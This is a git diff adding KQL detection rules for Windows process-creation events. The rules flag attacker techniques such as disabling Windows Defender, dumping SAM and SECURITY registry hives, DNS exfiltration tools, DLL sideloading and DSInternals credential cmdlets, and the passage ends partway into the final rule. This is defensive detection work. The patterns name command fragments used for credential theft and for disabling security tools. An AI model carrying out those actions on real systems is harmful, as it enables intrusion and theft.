+++ b/KQL/rules/windows/process_creation/directory_removal_via_rmdir.kql
@@ -0,0 +1,13 @@
+// Title: Directory Removal Via Rmdir
+// Author: frack113
+// Date: 2022-01-15
+// Level: low
+// Description: Detects execution of the builtin "rmdir" command in order to delete directories.
+// Adversaries may delete files left behind by the actions of their intrusion activity.
+// Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
+// Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "/q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and ProcessCommandLine contains "rmdir"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dirlister_execution.kql b/KQL/rules/windows/process_creation/dirlister_execution.kql
new file mode 100644
index 00000000..acce8563
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dirlister_execution.kql
@@ -0,0 +1,12 @@
+// Title: DirLister Execution
+// Author: frack113
+// Date: 2022-08-20
+// Level: low
+// Description: Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+// False Positives:
+//   - Legitimate use by users
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "DirLister.exe" or FolderPath endswith "\\DirLister.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/disable_important_scheduled_task.kql b/KQL/rules/windows/process_creation/disable_important_scheduled_task.kql
new file mode 100644
index 00000000..123f1198
--- /dev/null
+++ b/KQL/rules/windows/process_creation/disable_important_scheduled_task.kql
@@ -0,0 +1,10 @@
+// Title: Disable Important Scheduled Task
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems), X__Junior
+// Date: 2021-12-26
+// Level: high
+// Description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\ExploitGuard\\ExploitGuard MDM policy Refresh" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/Change" and ProcessCommandLine contains "/TN" and ProcessCommandLine contains "/disable") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/disable_windows_defender_av_security_monitoring.kql b/KQL/rules/windows/process_creation/disable_windows_defender_av_security_monitoring.kql
new file mode 100644
index 00000000..ae00516d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/disable_windows_defender_av_security_monitoring.kql
@@ -0,0 +1,12 @@
+// Title: Disable Windows Defender AV Security Monitoring
+// Author: ok @securonix invrep-de, oscd.community, frack113
+// Date: 2020-10-12
+// Level: high
+// Description: Detects attackers attempting to disable Windows Defender using Powershell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice.
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "-DisableBehaviorMonitoring $true" or ProcessCommandLine contains "-DisableRuntimeMonitoring $true")) or ((FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "WinDefend") or (ProcessCommandLine contains "config" and ProcessCommandLine contains "WinDefend" and ProcessCommandLine contains "start=disabled") or (ProcessCommandLine contains "stop" and ProcessCommandLine contains "WinDefend")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/disable_windows_iis_http_logging.kql b/KQL/rules/windows/process_creation/disable_windows_iis_http_logging.kql
new file mode 100644
index 00000000..3fed0f88
--- /dev/null
+++ b/KQL/rules/windows/process_creation/disable_windows_iis_http_logging.kql
@@ -0,0 +1,10 @@
+// Title: Disable Windows IIS HTTP Logging
+// Author: frack113
+// Date: 2022-01-09
+// Level: high
+// Description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:httplogging" and ProcessCommandLine contains "dontLog:true") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/disabled_ie_security_features.kql b/KQL/rules/windows/process_creation/disabled_ie_security_features.kql
new file mode 100644
index 00000000..58810f62
--- /dev/null
+++ b/KQL/rules/windows/process_creation/disabled_ie_security_features.kql
@@ -0,0 +1,10 @@
+// Title: Disabled IE Security Features
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-06-19
+// Level: high
+// Description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -name IEHarden " and ProcessCommandLine contains " -value 0 ") or (ProcessCommandLine contains " -name DEPOff " and ProcessCommandLine contains " -value 1 ") or (ProcessCommandLine contains " -name DisableFirstRunCustomize " and ProcessCommandLine contains " -value 2 ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/disabled_volume_snapshots.kql b/KQL/rules/windows/process_creation/disabled_volume_snapshots.kql
new file mode 100644
index 00000000..3156f377
--- /dev/null
+++ b/KQL/rules/windows/process_creation/disabled_volume_snapshots.kql
@@ -0,0 +1,12 @@
+// Title: Disabled Volume Snapshots
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-01-28
+// Level: high
+// Description: Detects commands that temporarily turn off Volume Snapshots
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Legitimate administration
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\Services\\VSS\\Diag" and ProcessCommandLine contains "/d Disabled"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql b/KQL/rules/windows/process_creation/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql
new file mode 100644
index 00000000..ba2035a6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql
@@ -0,0 +1,14 @@
+// Title: Disabling Windows Defender WMI Autologger Session via Reg.exe
+// Author: Matt Anderson (Huntress)
+// Date: 2025-07-09
+// Level: high
+// Description: Detects the use of reg.exe to disable the Event Tracing for Windows (ETW) Autologger session for Windows Defender API and Audit events.
+// By setting the 'Start' value to '0' for the 'DefenderApiLogger' or 'DefenderAuditLogger' session, an attacker can prevent these critical security events
+// from being logged, effectively blinding monitoring tools that rely on this data. This is a powerful defense evasion technique.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Highly unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "add" and ProcessCommandLine contains "0") and (ProcessCommandLine contains "\\Control\\WMI\\Autologger\\DefenderApiLogger\\Start" or ProcessCommandLine contains "\\Control\\WMI\\Autologger\\DefenderAuditLogger\\Start")) and (not(ProcessCommandLine contains "0x00000001"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/discovery_of_a_system_time.kql b/KQL/rules/windows/process_creation/discovery_of_a_system_time.kql
new file mode 100644
index 00000000..6507ec7c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/discovery_of_a_system_time.kql
@@ -0,0 +1,12 @@
+// Title: Discovery of a System Time
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: low
+// Description: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1124
+// False Positives:
+//   - Legitimate use of the system utilities to discover system time for legitimate reason
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "time" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "tz" and FolderPath endswith "\\w32tm.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/diskshadow_script_mode_execution_from_potential_suspicious_location.kql b/KQL/rules/windows/process_creation/diskshadow_script_mode_execution_from_potential_suspicious_location.kql
new file mode 100644
index 00000000..c0c7f665
--- /dev/null
+++ b/KQL/rules/windows/process_creation/diskshadow_script_mode_execution_from_potential_suspicious_location.kql
@@ -0,0 +1,12 @@
+// Title: Diskshadow Script Mode - Execution From Potential Suspicious Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-15
+// Level: medium
+// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fits your org needs.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe") and (ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Users\\Public\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/diskshadow_script_mode_uncommon_script_extension_execution.kql b/KQL/rules/windows/process_creation/diskshadow_script_mode_uncommon_script_extension_execution.kql
new file mode 100644
index 00000000..8082d4a6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/diskshadow_script_mode_uncommon_script_extension_execution.kql
@@ -0,0 +1,13 @@
+// Title: Diskshadow Script Mode - Uncommon Script Extension Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-15
+// Level: medium
+// Description: Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension.
+// Initial baselining of the allowed extension list is required.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe")) and (not(ProcessCommandLine contains ".txt"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dism_remove_online_package.kql b/KQL/rules/windows/process_creation/dism_remove_online_package.kql
new file mode 100644
index 00000000..028a7b0b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dism_remove_online_package.kql
@@ -0,0 +1,12 @@
+// Title: Dism Remove Online Package
+// Author: frack113
+// Date: 2022-01-16
+// Level: medium
+// Description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Legitimate script
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "/Online" and ProcessCommandLine contains "/Disable-Feature") and FolderPath endswith "\\Dism.exe") or (FolderPath endswith "\\DismHost.exe" and (InitiatingProcessCommandLine contains "/Online" and InitiatingProcessCommandLine contains "/Disable-Feature"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dll_execution_via_rasautou_exe.kql b/KQL/rules/windows/process_creation/dll_execution_via_rasautou_exe.kql
new file mode 100644
index 00000000..19aecc3b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dll_execution_via_rasautou_exe.kql
@@ -0,0 +1,12 @@
+// Title: DLL Execution via Rasautou.exe
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -d " and ProcessCommandLine contains " -p ") and (FolderPath endswith "\\rasautou.exe" or ProcessVersionInfoOriginalFileName =~ "rasdlui.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dll_execution_via_register_cimprovider_exe.kql b/KQL/rules/windows/process_creation/dll_execution_via_register_cimprovider_exe.kql
new file mode 100644
index 00000000..1aafa254
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dll_execution_via_register_cimprovider_exe.kql
@@ -0,0 +1,10 @@
+// Title: DLL Execution Via Register-cimprovider.exe
+// Author: Ivan Dyachkov, Yulia Fomina, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects using register-cimprovider.exe to execute arbitrary dll file.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-path" and ProcessCommandLine contains "dll") and FolderPath endswith "\\register-cimprovider.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dll_loaded_via_certoc_exe.kql b/KQL/rules/windows/process_creation/dll_loaded_via_certoc_exe.kql
new file mode 100644
index 00000000..e3a7c280
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dll_loaded_via_certoc_exe.kql
@@ -0,0 +1,10 @@
+// Title: DLL Loaded via CertOC.EXE
+// Author: Austin Songer @austinsonger
+// Date: 2021-10-23
+// Level: medium
+// Description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL " or ProcessCommandLine contains " –LoadDLL " or ProcessCommandLine contains " —LoadDLL " or ProcessCommandLine contains " ―LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dll_sideloading_by_vmware_xfer_utility.kql b/KQL/rules/windows/process_creation/dll_sideloading_by_vmware_xfer_utility.kql
new file mode 100644
index 00000000..e57b28c5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dll_sideloading_by_vmware_xfer_utility.kql
@@ -0,0 +1,12 @@
+// Title: DLL Sideloading by VMware Xfer Utility
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-02
+// Level: high
+// Description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\VMwareXferlogs.exe" and (not(FolderPath startswith "C:\\Program Files\\VMware\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dllhost_exe_execution_anomaly.kql b/KQL/rules/windows/process_creation/dllhost_exe_execution_anomaly.kql
new file mode 100644
index 00000000..7d169368
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dllhost_exe_execution_anomaly.kql
@@ -0,0 +1,12 @@
+// Title: Dllhost.EXE Execution Anomaly
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-27
+// Level: high
+// Description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine in~ ("dllhost.exe", "dllhost")) and FolderPath endswith "\\dllhost.exe") and (not(isnull(ProcessCommandLine)))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dllunregisterserver_function_call_via_msiexec_exe.kql b/KQL/rules/windows/process_creation/dllunregisterserver_function_call_via_msiexec_exe.kql
new file mode 100644
index 00000000..30d51c9c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dllunregisterserver_function_call_via_msiexec_exe.kql
@@ -0,0 +1,10 @@
+// Title: DllUnregisterServer Function Call Via Msiexec.EXE
+// Author: frack113
+// Date: 2022-04-24
+// Level: medium
+// Description: Detects MsiExec loading a DLL and calling its DllUnregisterServer function
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".dll" and (ProcessCommandLine contains " -z " or ProcessCommandLine contains " /z " or ProcessCommandLine contains " –z " or ProcessCommandLine contains " —z " or ProcessCommandLine contains " ―z ") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dns_exfiltration_and_tunneling_tools_execution.kql b/KQL/rules/windows/process_creation/dns_exfiltration_and_tunneling_tools_execution.kql
new file mode 100644
index 00000000..37691026
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dns_exfiltration_and_tunneling_tools_execution.kql
@@ -0,0 +1,12 @@
+// Title: DNS Exfiltration and Tunneling Tools Execution
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Well-known DNS Exfiltration tools execution
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048.001, attack.command-and-control, attack.t1071.004, attack.t1132.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\iodine.exe" or FolderPath contains "\\dnscat2"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/domain_trust_discovery_via_dsquery.kql b/KQL/rules/windows/process_creation/domain_trust_discovery_via_dsquery.kql
new file mode 100644
index 00000000..e0fdf059
--- /dev/null
+++ b/KQL/rules/windows/process_creation/domain_trust_discovery_via_dsquery.kql
@@ -0,0 +1,12 @@
+// Title: Domain Trust Discovery Via Dsquery
+// Author: E.M. Anhaus, Tony Lambert, oscd.community, omkar72
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects execution of "dsquery.exe" for domain trust discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1482
+// False Positives:
+//   - Legitimate use of the utilities by legitimate user for legitimate reason
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "trustedDomain" and (FolderPath endswith "\\dsquery.exe" or ProcessVersionInfoOriginalFileName =~ "dsquery.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/driver_dll_installation_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/driver_dll_installation_via_odbcconf_exe.kql
new file mode 100644
index 00000000..2c7dc135
--- /dev/null
+++ b/KQL/rules/windows/process_creation/driver_dll_installation_via_odbcconf_exe.kql
@@ -0,0 +1,12 @@
+// Title: Driver/DLL Installation Via Odbcconf.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: medium
+// Description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+//   - Legitimate driver DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "INSTALLDRIVER " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/driverquery_exe_execution.kql b/KQL/rules/windows/process_creation/driverquery_exe_execution.kql
new file mode 100644
index 00000000..30e251e4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/driverquery_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: DriverQuery.EXE Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-19
+// Level: medium
+// Description: Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+// False Positives:
+//   - Legitimate use by third party tools in order to investigate installed drivers
+
+DeviceProcessEvents
+| where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and (not(((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dropping_of_password_filter_dll.kql b/KQL/rules/windows/process_creation/dropping_of_password_filter_dll.kql
new file mode 100644
index 00000000..f6cb2abe
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dropping_of_password_filter_dll.kql
@@ -0,0 +1,10 @@
+// Title: Dropping Of Password Filter DLL
+// Author: Sreeman
+// Date: 2020-10-29
+// Level: medium
+// Description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.credential-access, attack.t1556.002
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "scecli\\0" and ProcessCommandLine contains "reg add"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dsinternals_suspicious_powershell_cmdlets.kql b/KQL/rules/windows/process_creation/dsinternals_suspicious_powershell_cmdlets.kql
new file mode 100644
index 00000000..5f0d892e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dsinternals_suspicious_powershell_cmdlets.kql
@@ -0,0 +1,13 @@
+// Title: DSInternals Suspicious PowerShell Cmdlets
+// Author: Nasreddine Bencherchali (Nextron Systems), Nounou Mbeiri
+// Date: 2024-06-26
+// Level: high
+// Description: Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.
+// The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+//   - Legitimate usage of DSInternals for administration or audit purpose.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Add-ADDBSidHistory" or ProcessCommandLine contains "Add-ADNgcKey" or ProcessCommandLine contains "Add-ADReplNgcKey" or ProcessCommandLine contains "ConvertFrom-ADManagedPasswordBlob" or ProcessCommandLine contains "ConvertFrom-GPPrefPassword" or ProcessCommandLine contains "ConvertFrom-ManagedPasswordBlob" or ProcessCommandLine contains "ConvertFrom-UnattendXmlPassword" or ProcessCommandLine contains "ConvertFrom-UnicodePassword" or ProcessCommandLine contains "ConvertTo-AADHash" or ProcessCommandLine contains "ConvertTo-GPPrefPassword" or ProcessCommandLine contains "ConvertTo-KerberosKey" or ProcessCommandLine contains "ConvertTo-LMHash" or ProcessCommandLine contains "ConvertTo-MsoPasswordHash" or ProcessCommandLine contains "ConvertTo-NTHash" or ProcessCommandLine contains "ConvertTo-OrgIdHash" or ProcessCommandLine contains "ConvertTo-UnicodePassword" or ProcessCommandLine contains "Disable-ADDBAccount" or ProcessCommandLine contains "Enable-ADDBAccount" or ProcessCommandLine contains "Get-ADDBAccount" or ProcessCommandLine contains "Get-ADDBBackupKey" or ProcessCommandLine contains "Get-ADDBDomainController" or ProcessCommandLine contains "Get-ADDBGroupManagedServiceAccount" or ProcessCommandLine contains "Get-ADDBKdsRootKey" or ProcessCommandLine contains "Get-ADDBSchemaAttribute" or ProcessCommandLine contains "Get-ADDBServiceAccount" or ProcessCommandLine contains "Get-ADDefaultPasswordPolicy" or ProcessCommandLine contains "Get-ADKeyCredential" or ProcessCommandLine contains "Get-ADPasswordPolicy" or ProcessCommandLine contains "Get-ADReplAccount" or ProcessCommandLine contains "Get-ADReplBackupKey" or ProcessCommandLine contains "Get-ADReplicationAccount" or ProcessCommandLine contains "Get-ADSIAccount" or ProcessCommandLine contains "Get-AzureADUserEx" or ProcessCommandLine contains "Get-BootKey" or ProcessCommandLine contains "Get-KeyCredential" or ProcessCommandLine contains "Get-LsaBackupKey" or ProcessCommandLine contains "Get-LsaPolicy" or ProcessCommandLine contains "Get-SamPasswordPolicy" or ProcessCommandLine contains "Get-SysKey" or ProcessCommandLine contains "Get-SystemKey" or ProcessCommandLine contains "New-ADDBRestoreFromMediaScript" or ProcessCommandLine contains "New-ADKeyCredential" or ProcessCommandLine contains "New-ADNgcKey" or ProcessCommandLine contains "New-NTHashSet" or ProcessCommandLine contains "Remove-ADDBObject" or ProcessCommandLine contains "Save-DPAPIBlob" or ProcessCommandLine contains "Set-ADAccountPasswordHash" or ProcessCommandLine contains "Set-ADDBAccountPassword" or ProcessCommandLine contains "Set-ADDBBootKey" or ProcessCommandLine contains "Set-ADDBDomainController" or ProcessCommandLine contains "Set-ADDBPrimaryGroup" or ProcessCommandLine contains "Set-ADDBSysKey" or ProcessCommandLine contains "Set-AzureADUserEx" or ProcessCommandLine contains "Set-LsaPolicy" or ProcessCommandLine contains "Set-SamAccountPasswordHash" or ProcessCommandLine contains "Set-WinUserPasswordHash" or ProcessCommandLine contains "Test-ADDBPasswordQuality" or ProcessCommandLine contains "Test-ADPasswordQuality" or ProcessCommandLine contains "Test-ADReplPasswordQuality" or ProcessCommandLine contains "Test-PasswordQuality" or ProcessCommandLine contains "Unlock-ADDBAccount" or ProcessCommandLine contains "Write-ADNgcKey" or ProcessCommandLine contains "Write-ADReplNgcKey"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dumping_of_sensitive_hives_via_reg_exe.kql b/KQL/rules/windows/process_creation/dumping_of_sensitive_hives_via_reg_exe.kql
new file mode 100644
index 00000000..abbf891a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dumping_of_sensitive_hives_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: Dumping of Sensitive Hives Via Reg.EXE
+// Author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113
+// Date: 2019-10-22
+// Level: high
+// Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002, attack.t1003.004, attack.t1003.005, car.2013-07-001
+// False Positives:
+//   - Dumping hives for legitimate purpouse i.e. backup or forensic investigation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " save " or ProcessCommandLine contains " export " or ProcessCommandLine contains " ˢave " or ProcessCommandLine contains " eˣport ") and (ProcessCommandLine contains "\\system" or ProcessCommandLine contains "\\sam" or ProcessCommandLine contains "\\security" or ProcessCommandLine contains "\\ˢystem" or ProcessCommandLine contains "\\syˢtem" or ProcessCommandLine contains "\\ˢyˢtem" or ProcessCommandLine contains "\\ˢam" or ProcessCommandLine contains "\\ˢecurity") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hk˪m" or ProcessCommandLine contains "hkey_local_machine" or ProcessCommandLine contains "hkey_˪ocal_machine" or ProcessCommandLine contains "hkey_loca˪_machine" or ProcessCommandLine contains "hkey_˪oca˪_machine") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dumping_process_via_sqldumper_exe.kql b/KQL/rules/windows/process_creation/dumping_process_via_sqldumper_exe.kql
new file mode 100644
index 00000000..52766419
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dumping_process_via_sqldumper_exe.kql
@@ -0,0 +1,12 @@
+// Title: Dumping Process via Sqldumper.exe
+// Author: Kirill Kiryanov, oscd.community
+// Date: 2020-10-08
+// Level: medium
+// Description: Detects process dump via legitimate sqldumper.exe binary
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+//   - Legitimate MSSQL Server actions
+
